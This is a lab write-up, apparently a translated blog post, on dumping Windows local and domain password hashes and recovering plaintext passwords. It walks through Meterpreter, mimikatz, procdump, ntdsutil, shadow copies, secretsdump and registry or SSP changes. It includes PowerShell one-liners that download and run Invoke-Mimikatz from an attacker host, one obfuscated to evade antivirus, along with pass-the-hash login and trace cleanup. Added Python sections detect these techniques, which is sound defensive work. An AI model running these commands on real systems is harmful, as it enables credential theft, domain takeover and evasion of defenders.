Several methods of dumping hashes and viewing plaintext passwords

Lab environment: Kali, Win10, Windows Server 2012 R2

Assuming access to the Win10 host has already been obtained, this records a few methods of obtaining the host's user hashes to create a further breakthrough.

In Windows, token stealing can only be done by a privileged user, i.e. the user must hold the SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege/SeIncreaseQuotaPrivilege privileges. After gaining access to the host, run whoami /priv to see which privileges the user holds.
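
The privilege check above is also the one a defender should run when auditing service accounts, because holding these privileges is what makes the token-theft step possible. The following added example (not part of the original post) parses `whoami /priv` output and reports which token-theft-relevant privileges a token holds; the sample output, the host it pretends to come from, and the `parse_whoami_priv` and `token_theft_privileges_held` names are my own constructions.

```python
import re

# Constructed sample output of `whoami /priv`, not captured from the lab host;
# it mimics the column layout the command prints.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# The privileges the text names as the precondition for token stealing.
TOKEN_THEFT_PRIVILEGES = (
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeIncreaseQuotaPrivilege",
)

# One table row: privilege name, free-text description, then Enabled/Disabled.
ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Map each privilege name in `whoami /priv` output to its State column."""
    privileges = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            privileges[m.group(1)] = m.group(2)
    return privileges


def token_theft_privileges_held(privileges):
    """Return the token-theft-relevant privileges present in the token.

    A privilege shown as Disabled is still held: the process can turn it on
    with AdjustTokenPrivileges, so the audit looks at presence, not state.
    """
    return [p for p in TOKEN_THEFT_PRIVILEGES if p in privileges]


def describe(text):
    """One-line summary suitable for an audit report."""
    held = token_theft_privileges_held(parse_whoami_priv(text))
    if not held:
        return "no token-impersonation privileges held"
    return "token-impersonation privileges held: " + ", ".join(held)


if __name__ == "__main__":
    print(describe(SAMPLE_WHOAMI_PRIV))
```

Run the same parser over `whoami /priv` output collected from each service account on a host (for example via a scheduled inventory job) to find accounts that hold these privileges without needing them.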

Host hashes

MSF

smart_hashdump

Built-in MSF module: post/windows/gather/smart_hashdump. Note the prerequisite: SYSTEM privileges.

hashdump

Worth noting: if hashes still cannot be obtained after getsystem, try migrating into a process that runs as SYSTEM and then run hashdump again.

Use ps to list the target host's processes

Use migrate to move into that process

incognito

As an aside, the incognito module can be used to steal the system administrator's token and then carry out the other hash-dump operations.

meterpreter > load incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -u // list available tokens
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
DESKTOP-3U0MUK9\chen
NT AUTHORITY\IUSR
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\ANONYMOUS LOGON
NT AUTHORITY\NETWORK SERVICE
Window Manager\DWM-1

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > steal_token 8720  // PID of the SYSTEM process found via ps
Stolen token with username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 4976 created.
Channel 1 created.
Microsoft Windows [版本 10.0.19042.1706]
(c) Microsoft Corporation。保留所有权利。

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>

mimikatz

Using the mimikatz tool, obtain the target hashes directly or indirectly.

Built-in

Use pwd to see the current path and upload to upload mimikatz.exe

Enter that path, run the command, and locate mimikatz.exe

If the current privileges are not administrator, privileges must be elevated first

With administrator privileges, it is enough to run sekurlsa::logonpasswords full and lsadump::sam

The SAM and SYSTEM hives can also be exported from the registry with the reg save option and then dumped offline

C:\Users\chen\Desktop>reg save hklm\sam sam.hive
reg save hklm\sam sam.hive
The operation completed successfully.

C:\Users\chen\Desktop>reg save hklm\system system.hive
reg save hklm\system system.hive
The operation completed successfully.

C:\Users\chen\Desktop>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::sam /sam:sam.hive /system:system.hive
Domain : DESKTOP-3U0MUK9
SysKey : d12d3127527d07224c3c4b97ca581262
Local SID : S-1-5-21-2691107070-1375161855-337516022

SAMKey : a9248f1b904d324a1efa1d3e622fbb1a

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: 9db5b04bca62e7fc1930392b2fe75014

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : afc9f9d944f1000fb8e91aa6c0eb9936

* Primary:Kerberos-Newer-Keys *
    Default Salt : DESKTOP-3U0MUK9WDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : fa2e99e95122dd2c083ef2e8ccf4d859f750e03652a939ce8490a91ebc954a5b
      aes128_hmac       (4096) : 96ab0404767d84872ec1d26835ed7a57
      des_cbc_md5       (4096) : 23d3b3e00d1358e5

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : DESKTOP-3U0MUK9WDAGUtilityAccount
    Credentials
      des_cbc_md5       : 23d3b3e00d1358e5

RID  : 000003e9 (1001)
User : chen
  Hash NTLM: 32ed87bdb5fdc5e9cba88547376818d4

Ticket export

Export the tickets

kerberos::list /export

These can then be cracked with Hashcat or similar tools

Third-party tools

Procdump

procdump is an official Microsoft tool, so it is generally on detection allowlists. Official download: https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

Upload procdump.exe to the target host and run the following command

procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp

Download the dump locally and read it with mimikatz

SQLDumper

Likewise carries a Microsoft signature (360 and Kaspersky do not catch it)

tasklist /svc | findstr "lsass.exe"

SqlDumper.exe pid 0 0x01100

powershell

Local

powershell -nop -exec bypass Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'
powershell -nop -exec bypass Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'

Remote (can be combined with other frameworks such as nishang, Empire, PowerSploit)

powershell -nop -exec bypass -c "iex(New-Object Net.webclient).downloadstring('http://vps-ip:port/InvokeMimikatz.ps1');Invoke-Mimikatz -DumpCred"

Obfuscation

powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'x.xx.xxx'+'.xx:xxxx/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvokeMimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"

Domain hashes

The environment here is Windows Server 2012 R2

MSF

First, naturally, the most direct one: hashdump

There is also a dedicated module

use post/windows/gather/credentials/domain_hashdump (failed)

No idea why ntds cannot be exported

Success should look like this:

(screenshot: 32metasploit-domain-hashdump.png)

mimikatz

lsadump::dcsync /domain:pentestlab.local /all /csv

To query a specific user, remember to add the $ suffix; if unsure of the name, run net group "domain computers" /domain to list them

lsadump::dcsync /domain:aim.com /user:jack$

Using lsass.exe

privilege::debug
lsadump::lsa /inject

DCSync

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-DCSync.ps1

powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.232.128:3122/Invoke-DCSync.ps1')";Invoke-DCSync -PWDumpFormat > hash.txt

Loading the powershell module inside msf (why it errors, I do not know either)

Or add the -PWDumpFormat parameter

ntdsutil

Run the following commands in order

ntdsutil.exe snapshot "activate instance ntds" create q q

Copy the GUID and run

ntdsutil.exe snapshot "mount {f558e268-3e8d-49f0-9421-b322b38cf0c5}" q q

Copy the directory path and run

copy 'C:\$SNAP_202211221302_VOLUMEC$\Windows\NTDS\ntds.dit' C:\Users\admin\ntds.dit

Offline cracking can then follow

Cleaning up traces:

ntdsutil.exe snapshot "List All" q q

ntdsutil.exe snapshot "umount {167c0406-0f3f-434e-93a6-52e77c8cd4c9}" "delete {167c0406-0f3f-434e-93a6-52e77c8cd4c9}" q q

Unmount and delete as many snapshot sets as there are

vshadow

Copy the ntds.dit, SAM or SYSTEM file

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.hiv
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\sam.hiv

After these run, a ShadowCopy file and sam.hiv are created in the root of the C: drive

Download them and crack with secretsdump.py from impacket; system.hiv is mandatory, as it contains the key needed to decrypt the contents of the NTDS file

impacket-secretsdump -ntds ShadowCopy -system system.hiv LOCAL

Once the hash is obtained, it can be used to log in with wmic and similar tools

impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:b3eefb3c06e2ce5b98066f3c1f00e730 aim.com/administrator@192.168.232.135 -codec gbk

Vshadow + ShadowCopy + QuarksPwDump

Upload vshadow.exe and exp.bat to the same directory. One pitfall: at first I used the 32-bit vshadow.exe and it failed many times; switching to the 64-bit one worked.

exp.bat

setlocal
if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK
set SOURCE_DRIVE_LETTER=%SystemDrive%
set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit
set DESTINATION_PATH=%~dp0
@echo ...Determine the scripts to be executed/generated...
set CALLBACK_SCRIPT=%~dpnx0
set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd
@echo ...Creating the shadow copy...
"%~dp0vshadow.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER%
del /f %TEMP_GENERATED_SCRIPT%
@goto :EOF
:IS_CALLBACK
setlocal
@echo ...Obtaining the shadow copy device name...
call %TEMP_GENERATED_SCRIPT%
@echo ...Copying from the shadow copy to the destination path...
copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%

Run the bat file

64-bit vshadow that works on Windows Server 2012 R2:

https://www.exefiles.com/zh-cn/exe/vshadow-exe/

Repair the copied database

esentutl /p /o ntds.dit1

Together with system.hive, QuarksPwDump reads the information and exports the result. This can be done offline, or QPD can be uploaded to the target.

QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit --system-file c:\system.hive -o c:\res.txt

Be sure to use absolute paths here, and put only a single space between an option and its argument.
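
Every technique in the host-hash and domain-hash sections above (reg save of the SAM/SYSTEM hives, procdump and SqlDumper against lsass, ntdsutil snapshots, vssadmin/vshadow shadow copies and the copy of ntds.dit out of them) leaves either a process-creation command line or an lsass access event behind. The following added example, which is not part of the original post, runs detection logic over constructed Security 4688-style and Sysmon Event ID 10-style records for all of them; the DC01 host name, the event dictionaries, the `EXPECTED_LSASS_READERS` allowlist and the function names are assumptions I made for the example.

```python
import re

# PROCESS_VM_READ is the access right any tool needs to read lsass.exe memory;
# Sysmon Event ID 10 reports the rights a process obtained as GrantedAccess.
PROCESS_VM_READ = 0x0010

# Processes that legitimately read lsass memory in this (assumed) baseline.
# Example allowlist only; tune it to the environment.
EXPECTED_LSASS_READERS = {"csrss.exe", "wininit.exe", "msmpeng.exe"}

# One rule per technique shown above: (label, regex over the command line).
COMMAND_LINE_RULES = [
    ("SAM/SYSTEM hive export via reg save",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I)),
    ("lsass memory dump via procdump",
     re.compile(r"\bprocdump(?:64)?(?:\.exe)?\s+.*\blsass(?:\.exe)?\b", re.I)),
    ("lsass memory dump via SqlDumper",
     re.compile(r"\bsqldumper(?:\.exe)?\s+\d+\s+0\s+0x0*1100\b", re.I)),
    ("NTDS snapshot via ntdsutil",
     re.compile(r"\bntdsutil(?:\.exe)?\s+.*\bsnapshot\b", re.I)),
    ("shadow copy created via vssadmin/vshadow",
     re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b|\bvshadow(?:\.exe)?\b", re.I)),
    ("ntds.dit or registry hive copied out of a shadow copy",
     re.compile(r"harddiskvolumeshadowcopy\d+\\windows\\(?:ntds\\ntds\.dit"
                r"|system32\\config\\(?:sam|system))"
                r"|\$snap_\d+_volume[a-z]\$\\windows\\ntds\\ntds\.dit", re.I)),
]

# Constructed sample telemetry (not real logs): 4688-style process creation
# records and Sysmon Event ID 10-style lsass access records.
PROCESS_EVENTS = [
    {"host": "DESKTOP-3U0MUK9", "user": "chen",
     "command_line": r"reg save hklm\sam sam.hive"},
    {"host": "DESKTOP-3U0MUK9", "user": "chen",
     "command_line": r"reg save hklm\system system.hive"},
    {"host": "DESKTOP-3U0MUK9", "user": "SYSTEM",
     "command_line": r"procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp"},
    {"host": "DC01", "user": "admin",   # DC01 is a made-up host name
     "command_line": r'ntdsutil.exe snapshot "activate instance ntds" create q q'},
    {"host": "DC01", "user": "admin",
     "command_line": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy"},
    {"host": "DC01", "user": "admin",   # benign: a query, not a hive export
     "command_line": r"reg query hklm\software\microsoft\windows\currentversion"},
]
LSASS_ACCESS_EVENTS = [
    {"host": "DESKTOP-3U0MUK9", "user": "SYSTEM",
     "source_image": r"C:\Users\chen\Desktop\procdump64.exe", "granted_access": 0x1FFFFF},
    {"host": "DESKTOP-3U0MUK9", "user": "SYSTEM",   # benign: no VM_READ bit
     "source_image": r"C:\Windows\System32\svchost.exe", "granted_access": 0x1000},
    {"host": "DESKTOP-3U0MUK9", "user": "chen",
     "source_image": r"C:\Users\chen\Desktop\mimikatz.exe", "granted_access": 0x1010},
]


def classify_command_line(command_line):
    """Labels of every dump technique the command line matches (empty if none)."""
    return [label for label, rx in COMMAND_LINE_RULES if rx.search(command_line)]


def lsass_access_is_suspicious(source_image, granted_access,
                               allowlist=EXPECTED_LSASS_READERS):
    """True when a process outside the allowlist obtained PROCESS_VM_READ on lsass."""
    image = source_image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return bool(granted_access & PROCESS_VM_READ) and image not in allowlist


def triage(process_events, lsass_access_events):
    """Run both detections and return one finding per hit."""
    findings = []
    for ev in process_events:
        for label in classify_command_line(ev["command_line"]):
            findings.append({"host": ev["host"], "user": ev["user"],
                             "technique": label, "evidence": ev["command_line"]})
    for ev in lsass_access_events:
        if lsass_access_is_suspicious(ev["source_image"], ev["granted_access"]):
            findings.append({"host": ev["host"], "user": ev["user"],
                             "technique": "lsass.exe memory read",
                             "evidence": "%s GrantedAccess=0x%X"
                                         % (ev["source_image"], ev["granted_access"])})
    return findings


if __name__ == "__main__":
    for f in triage(PROCESS_EVENTS, LSASS_ACCESS_EVENTS):
        print("[%s] %s (%s): %s" % (f["host"], f["technique"], f["user"], f["evidence"]))
```

The lsass rule deliberately keys on the PROCESS_VM_READ bit rather than on the exact masks seen here (0x1FFFFF for procdump, 0x1010 for mimikatz), since any dumper has to read process memory whatever else it requests; the allowlist is what keeps it quiet on a normal host and has to be built from a known-good baseline.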

Obtaining plaintext passwords

Some of these methods can also be used for persistence

Lab environment: Kali, Windows Server 2012 R2

Modify the registry

Change the setting so that plaintext passwords are recorded; what this actually does is turn on WDigest Auth in Windows

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

This command locks the user's screen; on Windows Server 2012, rundll32.exe is located under C:\Windows\SysWOW64

rundll32.exe user32.dll,LockWorkStation

Or wait until the user next locks the screen and re-enters the password to log in

Upload mimikatz.exe and the plaintext password recorded by wdigest can be seen

Revert the change so that plaintext passwords are no longer recorded

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

Forcing a screen lock can also be done with a PowerShell script

powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/kiraly15/Lock-WorkStation/master/Lock-WorkStation.ps1');"

Its contents are as follows:

Function Lock-WorkStation 
{
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation

PS: aside

PowerShell downgrade

-version 2

mimikatz_ssp records passwords

Upload mimikatz.exe and run the following commands

privilege::debug
misc::memssp

Lock the screen and log in again; a mimilsa.log is generated in the system32 directory

Or use Invoke-Mimikatz.ps1

Import-Module .\Invoke-Mimikatz.ps1  // import the module
Invoke-Mimikatz -Command "misc::memssp"  // no reboot needed; the recorded plaintext passwords are stored under that path

mimilib.dll + registry modification

The mimikatz repository contains the file mimilib.dll; upload it to the same directory as lsass.exe, i.e. c:\windows\system32. mimilib.dll comes in 32-bit and 64-bit versions; upload the one matching the system's bitness.

Modify the registry

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages" /t REG_MULTI_SZ /d mimilib.dll /f

Wait for the target to reboot, then check the directory again: a kiwissp.log has appeared

And the file keeps recording the passwords entered at logon and unlock
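
Both registry-based methods above (setting WDigest UseLogonCredential to 1, and adding mimilib.dll to the LSA "Security Packages" value) come down to a single registry value write, which makes them straightforward to alert on. The following added example, not part of the original post, audits constructed Security Event 4657-style registry-modification records for exactly these two writes; the event records, the `KNOWN_SECURITY_PACKAGES` baseline and the function names are my own assumptions.

```python
import re

# The two registry locations modified above, in a normalized lower-case form.
WDIGEST_KEY = r"hklm\system\currentcontrolset\control\securityproviders\wdigest"
LSA_KEY = r"hklm\system\currentcontrolset\control\lsa"

# Assumed baseline of package names that may appear in "Security Packages".
# Example allowlist only; take the real one from a known-good host.
KNOWN_SECURITY_PACKAGES = {"kerberos", "msv1_0", "schannel", "wdigest",
                           "tspkg", "pku2u", "cloudap"}

# Constructed sample records shaped like Security Event 4657 fields (object
# name, value name, new value, process, subject); not captured from a real host.
# REG_MULTI_SZ entries are represented here as a NUL-separated string.
REGISTRY_EVENTS = [
    {"key": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest",
     "value_name": "UseLogonCredential", "new_value": "1",
     "process": r"C:\Windows\System32\reg.exe", "user": "admin"},
    {"key": r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa",
     "value_name": "Security Packages", "new_value": "mimilib.dll",
     "process": r"C:\Windows\System32\reg.exe", "user": "admin"},
    {"key": r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa",   # benign: baseline only
     "value_name": "Security Packages",
     "new_value": "kerberos\x00msv1_0\x00schannel\x00wdigest\x00tspkg\x00pku2u",
     "process": r"C:\Windows\System32\svchost.exe", "user": "SYSTEM"},
    {"key": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest",
     "value_name": "UseLogonCredential", "new_value": "0",   # the revert command
     "process": r"C:\Windows\System32\reg.exe", "user": "admin"},
]


def normalize_key(path):
    """Lower-case a registry path and rewrite the kernel/long HKLM spellings."""
    p = path.strip().lower()
    for prefix in ("\\registry\\machine\\", "hkey_local_machine\\"):
        if p.startswith(prefix):
            p = "hklm\\" + p[len(prefix):]
    return p


def security_package_findings(raw_value, known=KNOWN_SECURITY_PACKAGES):
    """Entries of a multi-string value that are outside the baseline or that
    name a DLL file directly (as mimilib.dll does)."""
    entries = [e.strip() for e in re.split(r"[\x00\r\n]+", raw_value) if e.strip()]
    return [e for e in entries
            if e.lower() not in known or e.lower().endswith(".dll")]


def audit_registry_events(events):
    """One finding per event that enables WDigest plaintext caching or
    installs an unexpected LSA security package."""
    findings = []
    for ev in events:
        key = normalize_key(ev["key"])
        name = ev["value_name"].strip().lower()
        if key == WDIGEST_KEY and name == "uselogoncredential":
            if str(ev["new_value"]).strip().lower() not in ("0", "0x0", "0x00000000"):
                findings.append(("wdigest plaintext caching enabled",
                                 ev["user"], ev["process"], ev["new_value"]))
        elif key == LSA_KEY and name == "security packages":
            for pkg in security_package_findings(ev["new_value"]):
                findings.append(("unexpected LSA security package",
                                 ev["user"], ev["process"], pkg))
    return findings


if __name__ == "__main__":
    for finding in audit_registry_events(REGISTRY_EVENTS):
        print(finding)
```

Event 4657 only fires when auditing is enabled on those keys (a SACL on the WDigest and Lsa keys plus the "Audit Registry" subcategory), so the same checks are worth running periodically against a registry snapshot as well. Because `reg add /f` on a REG_MULTI_SZ replaces the whole value, comparing the new list against the previous one on the same host is a useful second check.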

Hook PasswordChangeNotify

https://github.com/Al1ex/Hook-PasswordChangeNotify

CVE-2021-36934

HiveNightmare: https://github.com/GossiTheDog/HiveNightmare

Windows Error Reporting service

https://github.com/deepinstinct/Lsass-Shtinkering
